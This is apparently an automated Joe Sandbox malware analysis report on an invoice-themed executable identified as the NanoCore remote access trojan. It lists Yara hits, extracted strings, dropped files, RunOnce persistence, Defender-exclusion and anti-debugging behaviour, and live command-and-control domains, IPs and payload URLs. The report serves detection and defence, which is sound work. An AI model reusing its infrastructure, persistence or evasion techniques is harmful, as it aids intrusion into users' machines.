      Source: Yara matchFile source: 18.2.CasPol.exe.5540000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.3dfb146.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.CN-Invoice-XXXXX9808-19011143287989.exe.44c0e30.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.5540000.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.CN-Invoice-XXXXX9808-19011143287989.exe.44c0e30.4.raw.unpack, type: UNPACKEDPE
      Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents
      Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents\RiXHGNhjF
      Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents
      Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents\RiXHGNhjF
      Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents
      Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents\RiXHGNhjF
      Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents
      Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents\RiXHGNhjF

      Remote Access Functionality:

      barindex
      Detected Nanocore RatShow sources
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: CasPol.exe, 00000012.00000002.1639236864.0000000003DF9000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: CasPol.exe, 00000012.00000002.1639236864.0000000003DF9000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000012.00000002.1639236864.0000000003DF9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.1643028705.0000000005540000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.1611766300.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 3236, type: MEMORY
      Source: Yara matchFile source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.5544629.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.3dfff7c.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.3dfff7c.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.3e045a5.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.5540000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.3dfb146.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.CN-Invoice-XXXXX9808-19011143287989.exe.44c0e30.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.5540000.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.CN-Invoice-XXXXX9808-19011143287989.exe.44c0e30.4.raw.unpack, type: UNPACKEDPE

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsNative API1Application Shimming1Exploitation for Privilege Escalation1Disable or Modify Tools11Input Capture11File and Directory Discovery11Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsCommand and Scripting Interpreter1Windows Service1Application Shimming1Deobfuscate/Decode Files or Information11LSASS MemorySystem Information Discovery13Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsService Execution2Registry Run Keys / Startup Folder1Access Token Manipulation1Obfuscated Files or Information2Security Account ManagerSecurity Software Discovery311SMB/Windows Admin SharesInput Capture11Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Windows Service1Software Packing11NTDSVirtualization/Sandbox Evasion24Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptProcess Injection112Timestomp1LSA SecretsProcess Discovery3SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRegistry Run Keys / Startup Folder1Masquerading11Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol12Jamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion24DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection112/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 358399 Sample: CN-Invoice-XXXXX9808-190111... Startdate: 25/02/2021 Architecture: WINDOWS Score: 100 55 annapro.linkpc.net 2->55 71 Found malware configuration 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 Multi AV Scanner detection for submitted file 2->75 77 15 other signatures 2->77 8 CN-Invoice-XXXXX9808-19011143287989.exe 23 9 2->8         started        13 explorer.exe 2->13         started        15 explorer.exe 2->15         started        17 3 other processes 2->17 signatures3 process4 dnsIp5 69 coroloboxorozor.com 172.67.172.17, 49754, 49760, 80 CLOUDFLARENETUS United States 8->69 49 C:\Users\Public\Documents\...\svchost.exe, PE32 8->49 dropped 51 C:\Users\...\svchost.exe:Zone.Identifier, ASCII 8->51 dropped 53 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 8->53 dropped 89 Adds a directory exclusion to Windows Defender 8->89 91 Tries to delay execution (extensive OutputDebugStringW loop) 8->91 93 Hides threads from debuggers 8->93 95 2 other signatures 8->95 19 CasPol.exe 8->19         started        24 AdvancedRun.exe 1 8->24         started        26 cmd.exe 8->26         started        34 7 other processes 8->34 28 svchost.exe 13->28         started        30 svchost.exe 15->30         started        32 WerFault.exe 17->32         started        file6 signatures7 process8 dnsIp9 57 185.157.160.233, 2212 OBE-EUROPEObenetworkEuropeSE Sweden 19->57 59 annapro.linkpc.net 105.112.98.239, 2212 VNL1-ASNG Nigeria 19->59 47 C:\Users\user\AppData\Roaming\...\run.dat, data 19->47 dropped 79 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->79 36 AdvancedRun.exe 24->36         started        39 conhost.exe 26->39         started        41 timeout.exe 26->41         started        61 104.21.71.230, 49758, 80 CLOUDFLARENETUS United States 28->61 63 coroloboxorozor.com 28->63 81 System process connects to network (likely due to code injection or exploit) 28->81 83 Multi AV Scanner detection for dropped file 28->83 85 Machine Learning detection for dropped file 28->85 87 Tries to delay execution (extensive OutputDebugStringW loop) 28->87 65 coroloboxorozor.com 30->65 43 conhost.exe 34->43         started        45 conhost.exe 34->45         started        file10 signatures11 process12 dnsIp13 67 192.168.2.1 unknown unknown 36->67

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      CN-Invoice-XXXXX9808-19011143287989.exe29%ReversingLabsByteCode-MSIL.Trojan.Pwsx
      CN-Invoice-XXXXX9808-19011143287989.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\Public\Documents\RiXHGNhjF\svchost.exe100%Joe Sandbox ML
      C:\Users\Public\Documents\RiXHGNhjF\svchost.exe38%ReversingLabsByteCode-MSIL.Backdoor.NanoBot
      C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe3%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe0%ReversingLabs

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      18.2.CasPol.exe.400000.0.unpack100%AviraHEUR/AGEN.1108376Download File
      18.2.CasPol.exe.5540000.9.unpack100%AviraTR/NanoCore.fadteDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
      http://crl.Q0%Avira URL Cloudsafe
      http://ocsp.sectigo.com00%URL Reputationsafe
      http://ocsp.sectigo.com00%URL Reputationsafe
      http://ocsp.sectigo.com00%URL Reputationsafe
      https://go.micro0%URL Reputationsafe
      https://go.micro0%URL Reputationsafe
      https://go.micro0%URL Reputationsafe
      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
      http://coroloboxorozor.com/base/75FE8DBFF9B09DE6205DD213CEB478DC.html0%Avira URL Cloudsafe
      https://sectigo.com/CPS0C0%URL Reputationsafe
      https://sectigo.com/CPS0C0%URL Reputationsafe
      https://sectigo.com/CPS0C0%URL Reputationsafe
      https://sectigo.com/CPS0D0%URL Reputationsafe
      https://sectigo.com/CPS0D0%URL Reputationsafe
      https://sectigo.com/CPS0D0%URL Reputationsafe
      185.157.160.2330%Avira URL Cloudsafe
      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
      http://coroloboxorozor.com0%Avira URL Cloudsafe
      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
      http://coroloboxorozor.com/base/D8145E38A6AEE16C4C80E6936C9A6886.html0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      coroloboxorozor.com
      172.67.172.17
      truetrue
        unknown
        annapro.linkpc.net
        105.112.98.239
        truefalse
          high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://coroloboxorozor.com/base/75FE8DBFF9B09DE6205DD213CEB478DC.htmltrue
          • Avira URL Cloud: safe
          unknown
          185.157.160.233true
          • Avira URL Cloud: safe
          unknown
          http://coroloboxorozor.com/base/D8145E38A6AEE16C4C80E6936C9A6886.htmltrue
          • Avira URL Cloud: safe
          unknown
          annapro.linkpc.netfalse
            high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tCN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://crl.Qpowershell.exe, 00000006.00000003.1450190829.0000000008D01000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://ocsp.sectigo.com0CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000003.1426826006.00000000051CB000.00000004.00000001.sdmpfalse
              high
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000003.1389202803.0000000007A12000.00000004.00000001.sdmpfalse
                high
                https://go.micropowershell.exe, 00000002.00000003.1412011053.0000000005371000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000003.1426826006.00000000051CB000.00000004.00000001.sdmpfalse
                  high
                  https://sectigo.com/CPS0CCN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://sectigo.com/CPS0DCN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sCN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://coroloboxorozor.comCN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1539328522.00000000033A1000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.1620558986.00000000030F1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.nirsoft.net/AdvancedRun.exe, AdvancedRun.exe, 00000005.00000000.1334457908.000000000040C000.00000002.00020000.sdmpfalse
                    high
                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1539328522.00000000033A1000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.1620558986.00000000030F1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.1410135765.0000000005360000.00000004.00000001.sdmpfalse
                      high
                      https://github.com/Pester/Pesterpowershell.exe, 00000002.00000003.1389202803.0000000007A12000.00000004.00000001.sdmpfalse
                        high

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        185.157.160.233
                        unknownSweden
                        197595OBE-EUROPEObenetworkEuropeSEtrue
                        104.21.71.230
                        unknownUnited States
                        13335CLOUDFLARENETUStrue
                        172.67.172.17
                        unknownUnited States
                        13335CLOUDFLARENETUStrue
                        105.112.98.239
                        unknownNigeria
                        36873VNL1-ASNGfalse

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:31.0.0 Emerald
                        Analysis ID:358399
                        Start date:25.02.2021
                        Start time:15:18:13
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 24m 35s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:CN-Invoice-XXXXX9808-19011143287989.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:26
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@40/21@6/5
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 100% (good quality ratio 95.8%)
                        • Quality average: 83%
                        • Quality standard deviation: 25.9%
                        HCA Information:
                        • Successful, ratio: 90%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240s for sample files taking high CPU consumption
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): backgroundTaskHost.exe, WmiPrvSE.exe
                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 184.30.21.219, 8.248.147.254, 67.27.233.254, 67.27.159.254, 8.248.143.254, 67.26.83.254, 2.20.142.210, 2.20.142.209, 93.184.220.29, 20.190.159.134, 40.126.31.1, 40.126.31.135, 40.126.31.143, 40.126.31.141, 40.126.31.139, 20.190.159.136, 40.126.31.6, 13.88.21.125, 52.255.188.83
                        • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, cs9.wac.phicdn.net, www.tm.lg.prod.aadmsa.akadns.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, www.tm.a.prd.aadg.akadns.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, storeedgefd.xbetservices.akadns.net, login.msa.msidentity.com, skypedataprdcoleus17.cloudapp.net, ocsp.digicert.com, login.live.com, audownload.windowsupdate.nsatc.net, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, auto.au.download.windowsupdate.com.c.footprint.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, storeedgefd.dsx.mp.microsoft.com
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.
                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/358399/sample/CN-Invoice-XXXXX9808-19011143287989.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        15:27:49AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce RoFLjAgKuqBmXmsAdKjJg explorer.exe "C:\Users\Public\Documents\RiXHGNhjF\svchost.exe"
                        15:27:57AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce RoFLjAgKuqBmXmsAdKjJg explorer.exe "C:\Users\Public\Documents\RiXHGNhjF\svchost.exe"
                        15:28:11API Interceptor98x Sleep call for process: powershell.exe modified
                        15:28:58API Interceptor1x Sleep call for process: WerFault.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        185.157.160.233CN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse
                          18.02.2021 PAYMENT INFO.exeGet hashmaliciousBrowse
                            CN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse
                              CN-Invoice-XXXXX9808-19011143287989 (2).exeGet hashmaliciousBrowse
                                Doc#6620200947535257653.exeGet hashmaliciousBrowse
                                  DHL_10177_R29_DOCUMENT.exeGet hashmaliciousBrowse
                                    Doc#6620200947535257653.exeGet hashmaliciousBrowse
                                      DHL_file 187652345643476245.exeGet hashmaliciousBrowse
                                        DHL_file 187652345643476245.exeGet hashmaliciousBrowse
                                          DHL_file 187652345643476245.exeGet hashmaliciousBrowse
                                            DHL_file 187652345643476245.exeGet hashmaliciousBrowse
                                              DHL_file 187652345643476245.exeGet hashmaliciousBrowse
                                                DHL_file 187652345643476245.exeGet hashmaliciousBrowse
                                                  FedExs AWB#5305323204643.exeGet hashmaliciousBrowse
                                                    URGENT QUOTATION 473833057.exeGet hashmaliciousBrowse
                                                      P-O Doc #6620200947535257653.exeGet hashmaliciousBrowse
                                                        104.21.71.230Sample Request for Proposal for Auditing Services.exeGet hashmaliciousBrowse
                                                        • coroloboxorozor.com/base/047C6EE29B052DE5AEEBC4044252D106.html
                                                        DHL_document1102202068090891.exeGet hashmaliciousBrowse
                                                        • coroloboxorozor.com/base/40146EDED8BA63D6AE3F2DAF99B02171.html
                                                        YrdW0m2bjE.exeGet hashmaliciousBrowse
                                                        • coroloboxorozor.com/base/F31A591A992F9F10459CA91956D4B922.html
                                                        em6eElVbOm.exeGet hashmaliciousBrowse
                                                        • coroloboxorozor.com/base/41C72DCCD6CF9EED413B0D331C345BAC.html
                                                        DOC-654354.xlsxGet hashmaliciousBrowse
                                                        • coroloboxorozor.com/base/03329EE96F201F380B0160C072BE819C.html
                                                        xQHJ4rJmTi.exeGet hashmaliciousBrowse
                                                        • coroloboxorozor.com/base/C31D970F225E46D6FFA42B117CC87914.html
                                                        RFQ CSDOK202040890.exeGet hashmaliciousBrowse
                                                        • coroloboxorozor.com/base/4718424E2FB21CE11C006797B5A97CCC.html
                                                        SAL-0908889000.exeGet hashmaliciousBrowse
                                                        • coroloboxorozor.com/base/707A5EEA0CF5BEFE1A44A93C9F311222.html
                                                        Purchase Order_Pdf.exeGet hashmaliciousBrowse
                                                        • coroloboxorozor.com/base/A0BC51B15BADC621E7C2DA57F1F666B5.html
                                                        SecuriteInfo.com.Artemis30F445BB737F.24261.exeGet hashmaliciousBrowse
                                                        • coroloboxorozor.com/base/F695B829409D0772EC82076D05B0449B.html
                                                        PO98000000090.jarGet hashmaliciousBrowse
                                                        • coroloboxorozor.com/base/6CE96E65ABD2B0982219B89A4C828006.html
                                                        Fireman.exeGet hashmaliciousBrowse
                                                        • coroloboxorozor.com/base/9D59BC62529BA422A6B7601976989B21.html
                                                        PO No. 2995_pdf.exeGet hashmaliciousBrowse
                                                        • coroloboxorozor.com/base/19F80EF211BCE8F026E05C220DD03823.html
                                                        NEW ORDER.exeGet hashmaliciousBrowse
                                                        • coroloboxorozor.com/base/55DEF9932F060D16BC71F37E3F290A51.html
                                                        CN-Invoice-XXXXX9808-19011143287993.exeGet hashmaliciousBrowse
                                                        • coroloboxorozor.com/base/4F54EC6FA5BCCB7C8CBF2FD8D36F4A4B.html
                                                        Payment Advise_pdf.exeGet hashmaliciousBrowse
                                                        • coroloboxorozor.com/base/42D34FE7FC3A8DC7D03B1AAE0BE699B2.html
                                                        Drawing No 2000168004_pdf.exeGet hashmaliciousBrowse
                                                        • coroloboxorozor.com/base/9D7EE41B1B2433EA717F325BBE38E31E.html
                                                        Purchase Order KV_RQ-7436819.docGet hashmaliciousBrowse
                                                        • coroloboxorozor.com/base/F695B829409D0772EC82076D05B0449B.html
                                                        Vrxs6evJO7.exeGet hashmaliciousBrowse
                                                        • coroloboxorozor.com/base/F5D6E85585BC7DA8D9717A01F3E50991.html
                                                        Property Files.exeGet hashmaliciousBrowse
                                                        • coroloboxorozor.com/base/A4FCBFE017C07A11E6D62EE2CEF4C50A.html

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        annapro.linkpc.netCN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse
                                                        • 105.112.108.188
                                                        CN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse
                                                        • 105.112.106.235
                                                        CN-Invoice-XXXXX9808-19011143287989 (2).exeGet hashmaliciousBrowse
                                                        • 105.112.109.252
                                                        Doc#6620200947535257653.exeGet hashmaliciousBrowse
                                                        • 105.112.102.162
                                                        Doc#6620200947535257653.exeGet hashmaliciousBrowse
                                                        • 105.112.106.128
                                                        DHL_file 187652345643476245.exeGet hashmaliciousBrowse
                                                        • 105.112.113.90
                                                        DHL_file 187652345643476245.exeGet hashmaliciousBrowse
                                                        • 105.112.113.90
                                                        DHL_file 187652345643476245.exeGet hashmaliciousBrowse
                                                        • 105.112.113.90
                                                        DHL_file 187652345643476245.exeGet hashmaliciousBrowse
                                                        • 105.112.113.90
                                                        FedExs AWB#5305323204643.exeGet hashmaliciousBrowse
                                                        • 105.112.113.90
                                                        DHL_document11022020680908911.exeGet hashmaliciousBrowse
                                                        • 129.205.113.251
                                                        DHL ShipmentDHL Shipment 237590.pdf.exeGet hashmaliciousBrowse
                                                        • 129.205.124.172
                                                        Doc_AWB#5305323204643_UPS.pdf.exeGet hashmaliciousBrowse
                                                        • 129.205.124.152
                                                        coroloboxorozor.comRFQ - REF 208056-pdf.exeGet hashmaliciousBrowse
                                                        • 172.67.172.17
                                                        CN-Invoice-XXXXX9808-19011143287994.exeGet hashmaliciousBrowse
                                                        • 172.67.172.17
                                                        RFQ_#2021-2-25-1.pdf.exeGet hashmaliciousBrowse
                                                        • 172.67.172.17
                                                        PRODUCT SPECIFICATION.exeGet hashmaliciousBrowse
                                                        • 172.67.172.17
                                                        Sample Request for Proposal for Auditing Services.exeGet hashmaliciousBrowse
                                                        • 104.21.71.230
                                                        DHL_document1102202068090891.exeGet hashmaliciousBrowse
                                                        • 172.67.172.17
                                                        Dekont.pdf.exeGet hashmaliciousBrowse
                                                        • 172.67.172.17
                                                        order inquiry.exeGet hashmaliciousBrowse
                                                        • 172.67.172.17
                                                        IMG_5771098.xlsxGet hashmaliciousBrowse
                                                        • 172.67.172.17
                                                        YrdW0m2bjE.exeGet hashmaliciousBrowse
                                                        • 104.21.71.230
                                                        em6eElVbOm.exeGet hashmaliciousBrowse
                                                        • 104.21.71.230
                                                        2070121SN-WS.exeGet hashmaliciousBrowse
                                                        • 172.67.172.17
